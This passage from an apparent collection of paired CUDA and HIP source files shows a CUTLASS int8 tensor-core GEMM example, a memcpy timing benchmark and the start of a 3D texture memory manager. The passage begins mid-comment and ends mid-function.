Hence, we setup data types for alpha and beta to be equal to ElementComputeEpilogue = int32_t. As we want to use MMA instructions on Turing and they support 8-bit signed integer (int8_t), we use data type for elements in input matrix A and B as int8_t. Volta also supports accumulation of partial dot product to int32_t, which can store wider range of numbers, we use it as data type of output matrix elements and accumulation. We convey this to CUTLASS kernel by initializing template variables ElementAccumulator (int32_t), ElementComputeEpilogue (int32_t), ElementInputA (int8_t), ElementInputB (int8_t), ElementOutput (int32_t). Communicating just the data type is not enough. As the data is laid out linearly in memory, we have to convey the layout of matrices. We do that by initializing template variable LayoutInputA to column major cutlass variable, LayoutInputB to row major and LayoutOutput to row major. Next, we setup rules to comptue alpha * X + beta * C which is called epilogue of the kernel. We initialize template variable EpilogueOp, which takes the data type of output ElementOutput (int32_t), the number of elements per vector memory access (16), data type of accumulator (int32_t) and data type of computation of linear combination (alpha * X + beta * C). Now that we setup the properties of data, we have to setup properties of computation. Second, we create template variables of tile sizes for thread-block, warp and mma-op to 128x256x64, 64x64x16, 8x8x16 (MxNxK) respectively. When passed to instantiate CUTLASS GEMM kernel, it internally deduce the amount of threads needed per thread-block, amount of shared memory, storing data in bank-conflict free manner, and ton of other variables required to compose, intialize and launch a high performance GEMM kernel. This is the beauty of CUTLASS, it relieves developer from understanding and coding complicated hardware optimizations which can easily go wrong. CUTLASS also supports multiple MMA pipelines in a threadblock. What are MMA pipelines? MMA pipelines constitute the whole process of loading input data from global memory to shared memory, loading data from shared memory to registers, doing matrix multiplication, store to global memory. The below flow sequence shows a typical mma pipeline. matrix in global memory -> registers -> tile in shared memory -> registers -> mma -> registers -> output to global memory The problem with single pipeline is, each stage is synchronous which means, each stage has to wait until the previous finished executing. There are stages in the pipeline which do not have fixed latency, for example, the loads from global memory and shared memory. Therefore, we can add one more pipeline with a phase shift in mma kernel to hide latency from global and shared memory loads. Finally, the pipeline in a kernel looks like (1) matrix in global memory -> (2) registers -> (3) tile in shared memory -> (4) registers -> (5) mma -> (6) registers -> (7) output to global memory (1) <null> -> (2) <null> -> (3) matrix in global memory -> (4) registers -> (5) tile in shared memory -> (6) registers -> (7) mma -> (8) registers -> (9) output to global memory This way, you can hide the second global memoroy load latency by doing computation on already loaded input data. There are few more template variables initialized such as, which threadblock tile of output matrix is done which threadblock launched on an SM, CUDA SM architecture of GPU you want to run on. 
These are all put together to create a template variable which describes CUTLASS GEMM kernel using cutlass::gemm::device::Gemm template. The next step is to intialize physical data, instantiate and initialize CUTLASS kernel and run it. We use CUTLASS utilities to initialize, fill, compare matrices as they are simple and doesn't come in the way of learning CUTLASS. Once all the matrices are initialized and filled with data, create arguments tuple to launch CUTLASS kernel which takes problem size (M = 5120, N = 4096 and K = 4096), matrices, alpha, beta and the important one, split k-dimension factor. Along with that, we query CUTLASS if any scratch-space memory required by the kernel we instantiated. If yes, we create it and pass it along with other arguments created to intialize CUTLASS kernel then, the kernel is launched. In this example, we later on launch a reference gemm kernel (from CUTLASS utilities) to compare if the output from CUTLASS kernel is same as reference GEMM kernel. */ #include <iostream> #include "cutlass/cutlass.h" #include "cutlass/gemm/device/gemm.h" #include "cutlass/util/host_tensor.h" #include "cutlass/util/reference/device/gemm.h" #include "cutlass/util/reference/host/tensor_compare.h" #include "cutlass/util/reference/host/tensor_copy.h" #include "cutlass/util/reference/host/tensor_fill.h" #include "cutlass/util/tensor_view_io.h" #include "helper.h" // The code section below describes datatype for input, output matrices and computation between // elements in input matrices. using ElementAccumulator = int32_t; // <- data type of accumulator using ElementComputeEpilogue = ElementAccumulator; // <- data type of epilogue operations using ElementInputA = int8_t; // <- data type of elements in input matrix A using ElementInputB = int8_t; // <- data type of elements in input matrix B using ElementOutput = int32_t; // <- data type of elements in output matrix D // The code section below describes matrix layout of input and output matrices. Column Major for // Matrix A, Row Major for Matrix B and Row Major for Matrix C using LayoutInputA = cutlass::layout::RowMajor; using LayoutInputB = cutlass::layout::ColumnMajor; using LayoutOutput = cutlass::layout::RowMajor; // This code section describes whether you want to use tensor cores or regular SIMT cores on GPU SM using MMAOp = cutlass::arch::OpClassTensorOp; // This code section describes CUDA SM architecture number using SmArch = cutlass::arch::Sm75; // This code section describes the tile size a thread block will compute using ShapeMMAThreadBlock = cutlass::gemm::GemmShape<128, 256, 64>; // <- threadblock tile M = 128, N = 256, K = 64 // This code section describes tile size a warp will compute using ShapeMMAWarp = cutlass::gemm::GemmShape<64, 64, 64>; // <- warp tile M = 64, N = 64, K = 16 // This code section describes the size of MMA op using ShapeMMAOp = cutlass::gemm::GemmShape<8, 8, 16>; // <- MMA Op tile M = 8, N = 8, K = 16 // This code section describes how threadblocks are scheduled on GPU using SwizzleThreadBlock = cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle; // <- ?? // This code section describes the epilogue part of the kernel using EpilogueOp = cutlass::epilogue::thread::LinearCombination< ElementOutput, // <- data type of output matrix 128 / cutlass::sizeof_bits<ElementOutput>::value, // <- the number of elements per vectorized // memory access. For a byte, it's 16 // elements. 
This becomes the vector width of // math instructions in the epilogue too ElementAccumulator, // <- data type of accumulator ElementComputeEpilogue>; // <- data type for alpha/beta in linear combination function // Number of pipelines you want to use constexpr int NumStages = 2; using Gemm = cutlass::gemm::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementAccumulator, MMAOp, SmArch, ShapeMMAThreadBlock, ShapeMMAWarp, ShapeMMAOp, EpilogueOp, SwizzleThreadBlock, NumStages>; int main() { // Turing Tensor Core operations exposed with mma.sync and ldmatrix are first available // in CUDA 10.2. // // CUTLASS must be compiled with CUDA 10.2 Toolkit to run these examples. if (!(__CUDACC_VER_MAJOR__ > 10 || (__CUDACC_VER_MAJOR__ == 10 && __CUDACC_VER_MINOR__ >= 2))) { std::cerr << "Turing Tensor Core operations must be compiled with CUDA 10.2 Toolkit or later." << std::endl; return -1; } hipDeviceProp_t props; hipError_t error = hipGetDeviceProperties(&props, 0); if (error != hipSuccess) { std::cerr << "hipGetDeviceProperties() returned an error: " << hipGetErrorString(error) << std::endl; return -1; } if (!((props.major * 10 + props.minor) >= 75)) { std::cerr << "Turing Tensor Core operations must be run on a machine with compute capability at least 75." << std::endl; return -1; } const int length_m = 5120; const int length_n = 4096; const int length_k = 4096; // Create a tuple of problem size for matrix multiplication cutlass::gemm::GemmCoord problem_size(length_m, length_n, length_k); // Initialize tensors using CUTLASS helper functions cutlass::HostTensor<ElementInputA, LayoutInputA> tensor_a( problem_size.mk()); // <- Create matrix A with dimensions M x K cutlass::HostTensor<ElementInputB, LayoutInputB> tensor_b( problem_size.nk()); // <- Create matrix B with dimensions N x K cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_c( problem_size.mn()); // <- Create matrix C with dimensions M x N cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // CUTLASS kernel cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_ref_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // reference kernel // Fill input and output matrices on host using CUTLASS helper functions cutlass::reference::host::TensorFillRandomUniform( tensor_a.host_view(), 1, ElementInputA(4), ElementInputA(-4), 0); // <- Fill matrix A on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_b.host_view(), 1, ElementInputB(4), ElementInputB(-4), 0); // <- Fill matrix B on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_c.host_view(), 1, ElementOutput(4), ElementOutput(-4), 0); // <- Fill matrix C on host with uniform-distribution random data cutlass::reference::host::TensorFill( tensor_d.host_view()); // <- fill matrix D on host with zeros cutlass::reference::host::TensorFill( tensor_ref_d.host_view()); // <- fill matrix D for reference on host with zeros // Copy data from host to GPU tensor_a.sync_device(); tensor_b.sync_device(); tensor_c.sync_device(); tensor_d.sync_device(); tensor_ref_d.sync_device(); // Initialize alpha and beta for dot product computation ElementComputeEpilogue alpha = ElementComputeEpilogue(1); ElementComputeEpilogue beta = ElementComputeEpilogue(0); // Split K dimension into 1 partitions int split_k_slices = 1; // 
Create a tuple of gemm kernel arguments. This is later passed as arguments to launch // instantiated CUTLASS kernel typename Gemm::Arguments arguments{problem_size, // <- problem size of matrix multiplication tensor_a.device_ref(), // <- reference to matrix A on device tensor_b.device_ref(), // <- reference to matrix B on device tensor_c.device_ref(), // <- reference to matrix C on device tensor_d.device_ref(), // <- reference to matrix D on device {alpha, beta}, // <- tuple of alpha and beta split_k_slices}; // <- k-dimension split factor // Using the arguments, query for extra workspace required for matrix multiplication computation size_t workspace_size = Gemm::get_workspace_size(arguments); // Allocate workspace memory cutlass::device_memory::allocation<uint8_t> workspace(workspace_size); // Instantiate CUTLASS kernel depending on templates Gemm gemm_op; // Initialize CUTLASS kernel with arguments and workspace pointer cutlass::Status status = gemm_op.initialize(arguments, workspace.get()); CUTLASS_CHECK(status); // Launch initialized CUTLASS kernel status = gemm_op(); CUTLASS_CHECK(status); // Create instantiation for device reference gemm kernel cutlass::reference::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementComputeEpilogue, ElementComputeEpilogue> gemm_device; // Launch device reference gemm kernel gemm_device(problem_size, alpha, tensor_a.device_ref(), tensor_b.device_ref(), beta, tensor_c.device_ref(), tensor_ref_d.device_ref()); // Wait for kernels to finish hipDeviceSynchronize(); // Copy output data from CUTLASS and reference kernel to host for comparison tensor_d.sync_host(); tensor_ref_d.sync_host(); // Check if output from CUTLASS kernel and reference kernel are equal or not std::cout << (cutlass::reference::host::TensorEquals(tensor_d.host_view(), tensor_ref_d.host_view()) ? "Passed" : "Failed") << std::endl; CUTLASS_CHECK(status); return 0; }
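Beyond the runtime status checks in the example, cutlass::gemm::device::Gemm can be asked up front whether a problem configuration is supported at all. A hedged sketch of such a pre-flight check, written as a standalone helper; check_supported is an illustrative name, and GemmType stands for an instantiation like the Gemm alias defined above.

#include <iostream>
#include "cutlass/cutlass.h"

// Ask a device-level GEMM instantiation whether it can run the given arguments
// before allocating the workspace or launching.
template <typename GemmType>
bool check_supported(typename GemmType::Arguments const& args) {
  cutlass::Status status = GemmType::can_implement(args);
  if (status != cutlass::Status::kSuccess) {
    std::cerr << "This GEMM configuration is not supported by the chosen instantiation."
              << std::endl;
    return false;
  }
  return true;
}

In the example above it would be called as check_supported<Gemm>(arguments) just before gemm_op.initialize(arguments, workspace.get()).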
0699e8415e9039caef46daf879eba05cbb7209a8.cu
/*************************************************************************************************** * Copyright (c) 2017-2019, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are permitted * provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the NVIDIA CORPORATION nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TOR (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * **************************************************************************************************/ /** This example shows how to run matrix multiplication kernels using functions and data structures provided by CUTLASS using tensor cores; which we run on a NVIDIA Turing GPU. Writing a single high performance matrix multiplication kernel is hard but do-able. Whereas writing high performance kernels at scale which works for multiple problem sizes with good abstractions is really hard. CUTLASS solves this problem by providing simplified abstractions to compose multiple sections of gemm kernel. When used properly, the kernels can hit peak performance of GPU easily. CUTLASS divides a kernel into hierarchical composable sections. Which means, at each thread, warp and thread-block level, they compute on their own tile-size with higher level of tile sizes being composed from lower level ones. Multiple thread-tiles (tile size each thread computes) can be used to form warp-tiles (tile size each warp computes) and multiple warp tiles can be used to compute threadblock-tile (tile size computed by a threadblock). In thie example, we split variable initialization into 1. Setting up data properties : describes how matrices are laid out in the memory and how the kernel can view them (logical to physical mapping) 2. Setting up computation properties : describes how the above set matrices will be used to compute output of matrix multiplication. First, we setup the data types of matrices A, B, C and D along with alpha, beta as the equation for GEMM is D = alpha * A * B + beta * C. In CUTLASS, the kernels first compute A * B and leaves the rest of the computation to end of the kernel as alpha * X + beta * C is a simple element-wise operation on X (A * B) and C. We call this as epilogue of kernel. Hence, we setup data types for alpha and beta to be equal to ElementComputeEpilogue = int32_t. 
As we want to use MMA instructions on Turing and they support 8-bit signed integer (int8_t), we use data type for elements in input matrix A and B as int8_t. Volta also supports accumulation of partial dot product to int32_t, which can store wider range of numbers, we use it as data type of output matrix elements and accumulation. We convey this to CUTLASS kernel by initializing template variables ElementAccumulator (int32_t), ElementComputeEpilogue (int32_t), ElementInputA (int8_t), ElementInputB (int8_t), ElementOutput (int32_t). Communicating just the data type is not enough. As the data is laid out linearly in memory, we have to convey the layout of matrices. We do that by initializing template variable LayoutInputA to column major cutlass variable, LayoutInputB to row major and LayoutOutput to row major. Next, we setup rules to comptue alpha * X + beta * C which is called epilogue of the kernel. We initialize template variable EpilogueOp, which takes the data type of output ElementOutput (int32_t), the number of elements per vector memory access (16), data type of accumulator (int32_t) and data type of computation of linear combination (alpha * X + beta * C). Now that we setup the properties of data, we have to setup properties of computation. Second, we create template variables of tile sizes for thread-block, warp and mma-op to 128x256x64, 64x64x16, 8x8x16 (MxNxK) respectively. When passed to instantiate CUTLASS GEMM kernel, it internally deduce the amount of threads needed per thread-block, amount of shared memory, storing data in bank-conflict free manner, and ton of other variables required to compose, intialize and launch a high performance GEMM kernel. This is the beauty of CUTLASS, it relieves developer from understanding and coding complicated hardware optimizations which can easily go wrong. CUTLASS also supports multiple MMA pipelines in a threadblock. What are MMA pipelines? MMA pipelines constitute the whole process of loading input data from global memory to shared memory, loading data from shared memory to registers, doing matrix multiplication, store to global memory. The below flow sequence shows a typical mma pipeline. matrix in global memory -> registers -> tile in shared memory -> registers -> mma -> registers -> output to global memory The problem with single pipeline is, each stage is synchronous which means, each stage has to wait until the previous finished executing. There are stages in the pipeline which do not have fixed latency, for example, the loads from global memory and shared memory. Therefore, we can add one more pipeline with a phase shift in mma kernel to hide latency from global and shared memory loads. Finally, the pipeline in a kernel looks like (1) matrix in global memory -> (2) registers -> (3) tile in shared memory -> (4) registers -> (5) mma -> (6) registers -> (7) output to global memory (1) <null> -> (2) <null> -> (3) matrix in global memory -> (4) registers -> (5) tile in shared memory -> (6) registers -> (7) mma -> (8) registers -> (9) output to global memory This way, you can hide the second global memoroy load latency by doing computation on already loaded input data. There are few more template variables initialized such as, which threadblock tile of output matrix is done which threadblock launched on an SM, CUDA SM architecture of GPU you want to run on. These are all put together to create a template variable which describes CUTLASS GEMM kernel using cutlass::gemm::device::Gemm template. 
The next step is to intialize physical data, instantiate and initialize CUTLASS kernel and run it. We use CUTLASS utilities to initialize, fill, compare matrices as they are simple and doesn't come in the way of learning CUTLASS. Once all the matrices are initialized and filled with data, create arguments tuple to launch CUTLASS kernel which takes problem size (M = 5120, N = 4096 and K = 4096), matrices, alpha, beta and the important one, split k-dimension factor. Along with that, we query CUTLASS if any scratch-space memory required by the kernel we instantiated. If yes, we create it and pass it along with other arguments created to intialize CUTLASS kernel then, the kernel is launched. In this example, we later on launch a reference gemm kernel (from CUTLASS utilities) to compare if the output from CUTLASS kernel is same as reference GEMM kernel. */ #include <iostream> #include "cutlass/cutlass.h" #include "cutlass/gemm/device/gemm.h" #include "cutlass/util/host_tensor.h" #include "cutlass/util/reference/device/gemm.h" #include "cutlass/util/reference/host/tensor_compare.h" #include "cutlass/util/reference/host/tensor_copy.h" #include "cutlass/util/reference/host/tensor_fill.h" #include "cutlass/util/tensor_view_io.h" #include "helper.h" // The code section below describes datatype for input, output matrices and computation between // elements in input matrices. using ElementAccumulator = int32_t; // <- data type of accumulator using ElementComputeEpilogue = ElementAccumulator; // <- data type of epilogue operations using ElementInputA = int8_t; // <- data type of elements in input matrix A using ElementInputB = int8_t; // <- data type of elements in input matrix B using ElementOutput = int32_t; // <- data type of elements in output matrix D // The code section below describes matrix layout of input and output matrices. Column Major for // Matrix A, Row Major for Matrix B and Row Major for Matrix C using LayoutInputA = cutlass::layout::RowMajor; using LayoutInputB = cutlass::layout::ColumnMajor; using LayoutOutput = cutlass::layout::RowMajor; // This code section describes whether you want to use tensor cores or regular SIMT cores on GPU SM using MMAOp = cutlass::arch::OpClassTensorOp; // This code section describes CUDA SM architecture number using SmArch = cutlass::arch::Sm75; // This code section describes the tile size a thread block will compute using ShapeMMAThreadBlock = cutlass::gemm::GemmShape<128, 256, 64>; // <- threadblock tile M = 128, N = 256, K = 64 // This code section describes tile size a warp will compute using ShapeMMAWarp = cutlass::gemm::GemmShape<64, 64, 64>; // <- warp tile M = 64, N = 64, K = 16 // This code section describes the size of MMA op using ShapeMMAOp = cutlass::gemm::GemmShape<8, 8, 16>; // <- MMA Op tile M = 8, N = 8, K = 16 // This code section describes how threadblocks are scheduled on GPU using SwizzleThreadBlock = cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle; // <- ?? // This code section describes the epilogue part of the kernel using EpilogueOp = cutlass::epilogue::thread::LinearCombination< ElementOutput, // <- data type of output matrix 128 / cutlass::sizeof_bits<ElementOutput>::value, // <- the number of elements per vectorized // memory access. For a byte, it's 16 // elements. 
This becomes the vector width of // math instructions in the epilogue too ElementAccumulator, // <- data type of accumulator ElementComputeEpilogue>; // <- data type for alpha/beta in linear combination function // Number of pipelines you want to use constexpr int NumStages = 2; using Gemm = cutlass::gemm::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementAccumulator, MMAOp, SmArch, ShapeMMAThreadBlock, ShapeMMAWarp, ShapeMMAOp, EpilogueOp, SwizzleThreadBlock, NumStages>; int main() { // Turing Tensor Core operations exposed with mma.sync and ldmatrix are first available // in CUDA 10.2. // // CUTLASS must be compiled with CUDA 10.2 Toolkit to run these examples. if (!(__CUDACC_VER_MAJOR__ > 10 || (__CUDACC_VER_MAJOR__ == 10 && __CUDACC_VER_MINOR__ >= 2))) { std::cerr << "Turing Tensor Core operations must be compiled with CUDA 10.2 Toolkit or later." << std::endl; return -1; } cudaDeviceProp props; cudaError_t error = cudaGetDeviceProperties(&props, 0); if (error != cudaSuccess) { std::cerr << "cudaGetDeviceProperties() returned an error: " << cudaGetErrorString(error) << std::endl; return -1; } if (!((props.major * 10 + props.minor) >= 75)) { std::cerr << "Turing Tensor Core operations must be run on a machine with compute capability at least 75." << std::endl; return -1; } const int length_m = 5120; const int length_n = 4096; const int length_k = 4096; // Create a tuple of problem size for matrix multiplication cutlass::gemm::GemmCoord problem_size(length_m, length_n, length_k); // Initialize tensors using CUTLASS helper functions cutlass::HostTensor<ElementInputA, LayoutInputA> tensor_a( problem_size.mk()); // <- Create matrix A with dimensions M x K cutlass::HostTensor<ElementInputB, LayoutInputB> tensor_b( problem_size.nk()); // <- Create matrix B with dimensions N x K cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_c( problem_size.mn()); // <- Create matrix C with dimensions M x N cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // CUTLASS kernel cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_ref_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // reference kernel // Fill input and output matrices on host using CUTLASS helper functions cutlass::reference::host::TensorFillRandomUniform( tensor_a.host_view(), 1, ElementInputA(4), ElementInputA(-4), 0); // <- Fill matrix A on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_b.host_view(), 1, ElementInputB(4), ElementInputB(-4), 0); // <- Fill matrix B on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_c.host_view(), 1, ElementOutput(4), ElementOutput(-4), 0); // <- Fill matrix C on host with uniform-distribution random data cutlass::reference::host::TensorFill( tensor_d.host_view()); // <- fill matrix D on host with zeros cutlass::reference::host::TensorFill( tensor_ref_d.host_view()); // <- fill matrix D for reference on host with zeros // Copy data from host to GPU tensor_a.sync_device(); tensor_b.sync_device(); tensor_c.sync_device(); tensor_d.sync_device(); tensor_ref_d.sync_device(); // Initialize alpha and beta for dot product computation ElementComputeEpilogue alpha = ElementComputeEpilogue(1); ElementComputeEpilogue beta = ElementComputeEpilogue(0); // Split K dimension into 1 partitions int split_k_slices = 1; 
// Create a tuple of gemm kernel arguments. This is later passed as arguments to launch // instantiated CUTLASS kernel typename Gemm::Arguments arguments{problem_size, // <- problem size of matrix multiplication tensor_a.device_ref(), // <- reference to matrix A on device tensor_b.device_ref(), // <- reference to matrix B on device tensor_c.device_ref(), // <- reference to matrix C on device tensor_d.device_ref(), // <- reference to matrix D on device {alpha, beta}, // <- tuple of alpha and beta split_k_slices}; // <- k-dimension split factor // Using the arguments, query for extra workspace required for matrix multiplication computation size_t workspace_size = Gemm::get_workspace_size(arguments); // Allocate workspace memory cutlass::device_memory::allocation<uint8_t> workspace(workspace_size); // Instantiate CUTLASS kernel depending on templates Gemm gemm_op; // Initialize CUTLASS kernel with arguments and workspace pointer cutlass::Status status = gemm_op.initialize(arguments, workspace.get()); CUTLASS_CHECK(status); // Launch initialized CUTLASS kernel status = gemm_op(); CUTLASS_CHECK(status); // Create instantiation for device reference gemm kernel cutlass::reference::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementComputeEpilogue, ElementComputeEpilogue> gemm_device; // Launch device reference gemm kernel gemm_device(problem_size, alpha, tensor_a.device_ref(), tensor_b.device_ref(), beta, tensor_c.device_ref(), tensor_ref_d.device_ref()); // Wait for kernels to finish cudaDeviceSynchronize(); // Copy output data from CUTLASS and reference kernel to host for comparison tensor_d.sync_host(); tensor_ref_d.sync_host(); // Check if output from CUTLASS kernel and reference kernel are equal or not std::cout << (cutlass::reference::host::TensorEquals(tensor_d.host_view(), tensor_ref_d.host_view()) ? "Passed" : "Failed") << std::endl; CUTLASS_CHECK(status); return 0; }
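One detail in the comments above is easy to misread: the epilogue's per-access vector width is computed as 128 / sizeof_bits<ElementOutput>, so the "16 elements" figure applies to 8-bit outputs, while the int32_t output used in this example gets 4 elements per 128-bit access. A small compile-time check of that arithmetic, assuming only cutlass/numeric_types.h:

#include "cutlass/numeric_types.h"

// A 128-bit vectorized access holds 4 int32_t outputs, or 16 int8_t values.
static_assert(128 / cutlass::sizeof_bits<int32_t>::value == 4,
              "four 32-bit elements per 128-bit access");
static_assert(128 / cutlass::sizeof_bits<int8_t>::value == 16,
              "sixteen 8-bit elements per 128-bit access");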
ef081f016fd7dd530e8083a224daa7234412905c.hip
// !!! This is a file automatically generated by hipify!!!
#define PG (4*1024)
#include <stdio.h>
#include <math.h>   // pow() is used below to generate the doubling chunk sizes

int main(void)
{
  int N = 2044*1024;
  float *x, *d_x;
  x = (float*)malloc(N*sizeof(float));
  hipMalloc(&d_x, N*sizeof(float));

  for (int i = 0; i < N; i++) {
    x[i] = 0;
  }

  hipEvent_t start, end;
  float time;
  int current = 0;

  hipEventCreate(&start);
  hipEventCreate(&end);

  hipEventRecord(start);
  for (int i = 0; i < 9; i++) {
    // Copy chunks of doubling size: 4 KiB, 8 KiB, ..., 1 MiB.
    // Note that the third argument is a byte count while current is also used
    // as a float-element offset, so successive chunks land in non-contiguous
    // regions of the (larger) allocation; only the transfer time is of interest.
    hipMemcpy((d_x+current), (x+current), (int)(1024*pow(2.0,(i+2))), hipMemcpyHostToDevice);
    current += (int)(1024*pow(2.0,(i+2)));
  }
  hipEventRecord(end);
  hipEventSynchronize(end);

  hipEventElapsedTime(&time, start, end);
  printf("time: %f\n", time);

  // Free memory
  hipEventDestroy(start);
  hipEventDestroy(end);
  hipFree(d_x);
  free(x);

  return 0;
}
ef081f016fd7dd530e8083a224daa7234412905c.cu
#define PG (4*1024)
#include <stdio.h>
#include <math.h>   // pow() is used below to generate the doubling chunk sizes

int main(void)
{
  int N = 2044*1024;
  float *x, *d_x;
  x = (float*)malloc(N*sizeof(float));
  cudaMalloc(&d_x, N*sizeof(float));

  for (int i = 0; i < N; i++) {
    x[i] = 0;
  }

  cudaEvent_t start, end;
  float time;
  int current = 0;

  cudaEventCreate(&start);
  cudaEventCreate(&end);

  cudaEventRecord(start);
  for (int i = 0; i < 9; i++) {
    // Copy chunks of doubling size: 4 KiB, 8 KiB, ..., 1 MiB.
    // Note that the third argument is a byte count while current is also used
    // as a float-element offset, so successive chunks land in non-contiguous
    // regions of the (larger) allocation; only the transfer time is of interest.
    cudaMemcpy((d_x+current), (x+current), (int)(1024*pow(2.0,(i+2))), cudaMemcpyHostToDevice);
    current += (int)(1024*pow(2.0,(i+2)));
  }
  cudaEventRecord(end);
  cudaEventSynchronize(end);

  cudaEventElapsedTime(&time, start, end);
  printf("time: %f\n", time);

  // Free memory
  cudaEventDestroy(start);
  cudaEventDestroy(end);
  cudaFree(d_x);
  free(x);

  return 0;
}
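The host buffer in this benchmark is pageable, so every cudaMemcpy is staged through a driver-owned pinned buffer and the measured times can vary from run to run. A hedged variant sketch using pinned host memory and reporting an effective bandwidth; report_bandwidth is an illustrative helper, and the nine doubling chunks (4 KiB up to 1 MiB) sum to 4 KiB * (2^9 - 1) = 2044 KiB.

#include <stdio.h>
#include <math.h>
#include <cuda_runtime.h>

// Illustrative helper: convert an event-timed copy into an effective rate.
static void report_bandwidth(size_t total_bytes, float time_ms) {
  double gib_per_s = (double)total_bytes / (time_ms / 1000.0) / (1024.0 * 1024.0 * 1024.0);
  printf("copied %zu bytes in %f ms -> %.3f GiB/s\n", total_bytes, time_ms, gib_per_s);
}

int main(void) {
  int N = 2044 * 1024;
  float *x, *d_x;
  cudaMallocHost(&x, N * sizeof(float));  // pinned (page-locked) host memory
  cudaMalloc(&d_x, N * sizeof(float));
  for (int i = 0; i < N; i++) x[i] = 0;

  cudaEvent_t start, end;
  cudaEventCreate(&start);
  cudaEventCreate(&end);

  size_t total = 0;  // bytes copied so far; also used to derive the element offset
  cudaEventRecord(start);
  for (int i = 0; i < 9; i++) {
    size_t bytes = (size_t)(1024 * pow(2.0, i + 2));  // 4 KiB, 8 KiB, ..., 1 MiB
    cudaMemcpy(d_x + total / sizeof(float), x + total / sizeof(float), bytes,
               cudaMemcpyHostToDevice);
    total += bytes;
  }
  cudaEventRecord(end);
  cudaEventSynchronize(end);

  float time_ms = 0.0f;
  cudaEventElapsedTime(&time_ms, start, end);
  report_bandwidth(total, time_ms);

  cudaEventDestroy(start);
  cudaEventDestroy(end);
  cudaFree(d_x);
  cudaFreeHost(x);
  return 0;
}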
aa908474c53195cb8f6afbad9dfa20b5819c9daa.hip
// !!! This is a file automatically generated by hipify!!! /****************************************************************************/ /* Copyright (c) 2011, Javor Kalojanov * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /****************************************************************************/ #include "CUDAStdAfx.h" #include "Core/Algebra.hpp" #include "RT/Structure/3DTextureMemoryManager.h" HOST void TextureMemoryManager::checkResolution() { if (resX <= 0 || resY <= 0 || resZ <= 0) { cudastd::logger::out << "Invalid texture resolution!" << " Setting texture resolution to 32 x 32 x 32\n"; resX = resY = resZ = 32; } } ////////////////////////////////////////////////////////////////////////// //data transfer related ////////////////////////////////////////////////////////////////////////// HOST void TextureMemoryManager::copyDataDeviceToHost() { hipMemcpy3DParms cpyParamsDownloadPtr = { 0 }; cpyParamsDownloadPtr.srcPtr = texelPtrDevice; cpyParamsDownloadPtr.dstPtr = texelPtrHost; cpyParamsDownloadPtr.extent = make_hipExtent(resX * sizeof(float3), resY, resZ); cpyParamsDownloadPtr.kind = hipMemcpyDeviceToHost; MY_CUDA_SAFE_CALL( hipMemcpy3D(&cpyParamsDownloadPtr) ); } HOST void TextureMemoryManager::copyDataHostToDevice() { hipMemcpy3DParms cpyParamsUploadPtr = { 0 }; cpyParamsUploadPtr.srcPtr = texelPtrHost; cpyParamsUploadPtr.dstPtr = texelPtrDevice; cpyParamsUploadPtr.extent = make_hipExtent(resX * sizeof(float3), resY, resZ); 